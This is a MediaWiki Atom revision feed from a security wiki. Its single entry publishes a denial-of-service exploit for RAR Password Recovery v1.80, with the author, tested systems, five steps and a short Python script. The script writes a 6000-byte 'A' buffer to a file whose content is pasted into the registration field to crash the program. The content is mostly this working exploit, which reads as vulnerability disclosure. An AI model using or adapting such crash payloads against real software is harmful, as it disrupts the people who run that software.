<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=RAR_Password_Recovery_1.80_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>RAR Password Recovery 1.80 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=RAR_Password_Recovery_1.80_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=RAR_Password_Recovery_1.80_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T12:12:30Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=RAR_Password_Recovery_1.80_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2004&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit # Date: 16.08.2019 # Vendor Homepage:https://www.top-password.com/ # Software Link:  https...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=RAR_Password_Recovery_1.80_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=2004&amp;oldid=prev"/>
		<updated>2021-05-02T04:23:50Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit # Date: 16.08.2019 # Vendor Homepage:https://www.top-password.com/ # Software Link:  https...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit&lt;br /&gt;
# Date: 16.08.2019&lt;br /&gt;
# Vendor Homepage:https://www.top-password.com/&lt;br /&gt;
# Software Link:  https://www.top-password.com/download/RARPRSetup.exe&lt;br /&gt;
# Exploit Author: Achilles&lt;br /&gt;
# Tested Version: v1.80&lt;br /&gt;
# Tested on: Windows 7 x64&lt;br /&gt;
#            Windows XP SP3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# 1.- Run python code :RAR Password Recovery.py&lt;br /&gt;
# 2.- Open EVIL.txt and copy content to clipboard&lt;br /&gt;
# 3.- Open RAR Password Recovery and Click 'Register'&lt;br /&gt;
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'&lt;br /&gt;
# 5.- Click 'OK' and you will see a crash.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 6000&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
	f=open(&amp;quot;Evil.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
	print &amp;quot;[+] Creating %s bytes evil payload..&amp;quot; %len(buffer)&lt;br /&gt;
	f.write(buffer)&lt;br /&gt;
	f.close()&lt;br /&gt;
	print &amp;quot;[+] File created!&amp;quot;&lt;br /&gt;
except:&lt;br /&gt;
	print &amp;quot;File cannot be created&amp;quot;&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>